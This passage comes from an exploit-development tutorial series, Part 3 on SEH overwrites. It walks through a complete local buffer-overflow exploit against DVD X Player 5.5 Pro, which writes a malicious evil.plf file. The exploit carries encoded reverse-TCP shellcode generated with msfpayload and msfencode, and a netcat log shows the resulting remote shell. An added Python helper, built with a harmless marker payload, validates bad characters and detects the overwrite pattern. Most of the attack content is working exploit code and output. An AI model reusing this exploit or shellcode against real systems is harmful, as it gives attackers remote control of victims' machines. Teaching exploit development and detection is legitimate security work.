- Part 1: Introduction to Exploit Development
- Part 2: Saved Return Pointer Overflows
- Part 3: Structured Exception Handler (SEH)
- Part 4: Egg Hunters
- Part 5: Unicode 0x00410041
- Part 6: Writing WIN32 Shellcode
- Part 7: Return Oriented Programming (ROP)
- Part 8: Heap Spraying, Part 1 [overwriting EIP]
- Part 9: Heap Spraying [Part 2: UAF]
- Part 10: Kernel Exploitation: Stack Overflow
- Part 11: Kernel Exploitation: Arbitrary Write (write-what-where)
- Part 12: Kernel Exploitation: Null Pointer Dereference
- Part 13: Kernel Exploitation: Uninitialized Stack Variable
- Part 14: Kernel Exploitation: Integer Overflow
- Part 15: Kernel Exploitation: UAF
- Part 16: Kernel Exploitation: Pool Overflow
- Part 17: Kernel Exploitation: Arbitrary Write (write-what-where)
- Part 18: Kernel Exploitation: RS2 Bitmap Necromancy
- Part 19: Kernel Exploitation: Razer
With that done, all that is left is to add our shellcode to the exploit. Because the padding is computed dynamically, as before, swapping in a different payload is easy: in the skeleton below, the Shellcode variable can hold whatever code we want executed.
```python
#!/usr/bin/python -w
filename="evil.plf"

Shellcode = (
    ""    # placeholder: the encoded payload string goes here
)

#----------------------------------------------------------------------------------#
# (*) badchars = '\x00\x0A\x0D\x1A'                                                #
#                                                                                  #
# offset to: (2) nseh 608-bytes, (1) seh 612-bytes                                 #
# (2) nseh = '\xEB\x06' => jump short 6-bytes                                      #
# (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll                         #
# (3) Shellcode space = 1384-bytes                                                 #
#----------------------------------------------------------------------------------#
# SEH Exploit Structure:                                                           #
#                             \---------------->                                   #
# [AAA..................AAA] [nseh] [seh] [BBB..................BBB]               #
#                                \-------------------------------------->          #
#                                     <-------/                                    #
# (1) Initial overwrite, SEH leads us back 4-bytes to nSEH                         #
# (2) nSEH jumps over SEH and redirects execution to our B's                       #
# (3) We place our Shellcode here ... Game Over!                                   #
#----------------------------------------------------------------------------------#

# 20 NOPs in front of the payload, then fill the remaining space with B's
evil = "\x90"*20 + Shellcode
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil))

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
```
Time to generate some shellcode. To avoid repeating myself, this time I decided to use a reverse shell…
```
root@bt:~# msfpayload -l
[...snip...]
    windows/shell_bind_tcp_xpfw    Disable the Windows ICF, then listen for a connection and spawn a command shell
    windows/shell_reverse_tcp      Connect back to attacker and spawn a command shell
    windows/speak_pwned            Causes the target to say "You Got Pwned" via the Windows Speech API
[...snip...]

root@bt:~# msfpayload windows/shell_reverse_tcp O

       Name: Windows Command Shell, Reverse TCP Inline
     Module: payload/windows/shell_reverse_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 314
       Rank: Normal

Provided by:
  vlad902 <vlad902@gmail.com>
  sf <stephen_fewer@harmonysecurity.com>

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

Description:
  Connect back to attacker and spawn a command shell

root@bt:~# msfpayload windows/shell_reverse_tcp LHOST= LPORT=9988 R| msfencode -b '\x00\x0A\x0D\x1A' -t c
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

unsigned char buf[] =
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54";
```
With a few comments added, the final exploit looks like this:
```python
#!/usr/bin/python -w
#----------------------------------------------------------------------------------#
# Exploit: DVD X Player 5.5 Pro SEH (local BOF)                                    #
# OS: Tested XP PRO SP3 (EPG.dll should be universal)                              #
# Author: b33f (Ruben Boonen)                                                      #
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications       #
#           /cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe                  #
#----------------------------------------------------------------------------------#
# This exploit was created for Part 3 of my Exploit Development tutorial series... #
# http://www.fuzzysecurity.com/tutorials/expDev/3.html                             #
#----------------------------------------------------------------------------------#
# root@bt:~# nc -lvp 9988                                                          #
# listening on [any] 9988 ...                                                      #
# inverse host lookup failed: Unknown server error                                 #
# connect to [] from (UNKNOWN) [] 1044                                             #
# Microsoft Windows XP [Version 5.1.2600]                                          #
# (C) Copyright 1985-2001 Microsoft Corp.                                          #
#                                                                                  #
# G:\tutorial>ipconfig                                                             #
# ipconfig                                                                         #
#                                                                                  #
# Windows IP Configuration                                                         #
#                                                                                  #
#                                                                                  #
# Ethernet adapter Local Area Connection:                                          #
#                                                                                  #
#         Connection-specific DNS Suffix  . : localdomain                          #
#         IP Address. . . . . . . . . . . . :                                      #
#         Subnet Mask . . . . . . . . . . . :                                      #
#         Default Gateway . . . . . . . . . :                                      #
#                                                                                  #
# G:\tutorial>                                                                     #
#----------------------------------------------------------------------------------#

filename="evil.plf"

#---------------------------------------------------------------------------------------------------------------#
# msfpayload windows/shell_reverse_tcp LHOST= LPORT=9988 R| msfencode -b '\x00\x0A\x0D\x1A' -t c               #
# [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)                                                  #
#---------------------------------------------------------------------------------------------------------------#
Shellcode = (
"\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
"\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8"
"\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1"
"\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5"
"\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44"
"\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b"
"\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e"
"\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3"
"\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c"
"\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30"
"\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22"
"\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d"
"\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e"
"\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c"
"\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c"
"\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6"
"\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde"
"\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b"
"\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17"
"\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68"
"\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71"
"\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff"
"\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54")

#----------------------------------------------------------------------------------#
# (*) badchars = '\x00\x0A\x0D\x1A'                                                #
#                                                                                  #
# offset to: (2) nseh 608-bytes, (1) seh 612-bytes                                 #
# (2) nseh = '\xEB\x06' => jump short 6-bytes                                      #
# (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll                         #
# (3) Shellcode space = 1384-bytes                                                 #
#----------------------------------------------------------------------------------#
# SEH Exploit Structure:                                                           #
#                             \---------------->                                   #
# [AAA..................AAA] [nseh] [seh] [BBB..................BBB]               #
#                                \-------------------------------------->          #
#                                     <-------/                                    #
# (1) Initial EIP overwrite, SEH leads us back 4-bytes to nSEH                     #
# (2) nSEH jumps over SEH and redirects execution to our B's                       #
# (3) We place our Shellcode here ... Game Over!                                   #
#----------------------------------------------------------------------------------#

# 20 NOPs in front of the payload, then fill the remaining space with B's
evil = "\x90"*20 + Shellcode
buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil))

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
```
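The layout above is easy to get subtly wrong (an off-by-one in the filler, a bad character surviving encoding, a jump that no longer lands on the payload), and the same layout is also what a file scanner can key on. The following Python 3 helper is an added example, not the tutorial's code: it builds a constructed sample `.plf` blob with the tutorial's offsets but a harmless `int3` marker in place of a real payload, verifies that no byte from the `badchars` list is present, parses the nSEH/SEH fields, and flags the "long filler run immediately followed by a short jump" pattern a triage tool could use to spot this class of SEH overwrite. The function names, the `min_run` threshold and the sample data are my own choices.

```python
# Added example, not part of the original tutorial. Python 3.
import struct

# Values taken from the tutorial's exploit layout.
BADCHARS = b"\x00\x0a\x0d\x1a"
NSEH_OFFSET = 608          # bytes of filler before the nSEH field
SHELLCODE_SPACE = 1384     # bytes available after the SEH field
EPG_POP_POP_RET = 0x61617619


def build_sample_plf(payload: bytes) -> bytes:
    """Constructed sample with the tutorial's layout; payload is a harmless stand-in."""
    evil = b"\x90" * 20 + payload
    if len(evil) > SHELLCODE_SPACE:
        raise ValueError("payload does not fit in the available space")
    return (b"A" * NSEH_OFFSET
            + b"\xeb\x06\x90\x90"                    # nSEH: jmp short +6, padded to 4 bytes
            + struct.pack("<I", EPG_POP_POP_RET)     # SEH: pop pop ret in EPG.dll (little-endian)
            + evil
            + b"B" * (SHELLCODE_SPACE - len(evil)))


def badchars_in(data: bytes, badchars: bytes = BADCHARS) -> list:
    """Return (offset, value) for every byte of data that appears in badchars."""
    return [(i, b) for i, b in enumerate(data) if b in badchars]


def inspect_seh_layout(blob: bytes, nseh_offset: int = NSEH_OFFSET) -> dict:
    """Parse the nSEH/SEH fields at nseh_offset and summarise what they contain."""
    nseh = blob[nseh_offset:nseh_offset + 4]
    seh = blob[nseh_offset + 4:nseh_offset + 8]
    if len(nseh) < 4 or len(seh) < 4:
        raise ValueError("blob too short to hold an SEH record at that offset")
    return {
        "total_len": len(blob),
        "nseh_is_short_jump": nseh[:2] == b"\xeb\x06",
        "seh_addr": struct.unpack("<I", seh)[0],
        # 0x19 sits just below the 0x1A bad character, so the address survives the copy
        "seh_addr_badchar_free": not badchars_in(seh),
        "shellcode_space": len(blob) - nseh_offset - 8,
    }


def looks_like_seh_overwrite(blob: bytes, min_run: int = 64) -> bool:
    """Heuristic: a run of one filler byte of at least min_run, directly followed by jmp short."""
    i, n = 0, len(blob)
    while i < n:
        j = i
        while j < n and blob[j] == blob[i]:
            j += 1                      # extend the run of identical bytes
        if j - i >= min_run and blob[j:j + 2] == b"\xeb\x06":
            return True
        i = j
    return False


if __name__ == "__main__":
    sample = build_sample_plf(b"\xcc" * 16)   # int3 marker, not a real payload
    print(inspect_seh_layout(sample))
    print("bad chars:", badchars_in(sample))
    print("SEH overwrite pattern:", looks_like_seh_overwrite(sample))
```

Running the block on the constructed sample reports a 2000-byte blob, a short jump in nSEH, `0x61617619` in SEH, 1384 bytes of payload space and no bad characters; the run-then-jump heuristic fires on the sample and stays quiet on plain filler. To check a real encoded payload for bad characters, pass its bytes to `badchars_in` before embedding it.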
In the listing below we can see that once the exploit runs we get a reverse shell. Game over!!
```
root@bt:~/Desktop# nc -lvp 9988
listening on [any] 9988 ...
inverse host lookup failed: Unknown server error : Connection timed out
connect to [] from (UNKNOWN) [] 1044
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

G:\tutorial>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . :
        Subnet Mask . . . . . . . . . . . :
        Default Gateway . . . . . . . . . :

G:\tutorial>
```
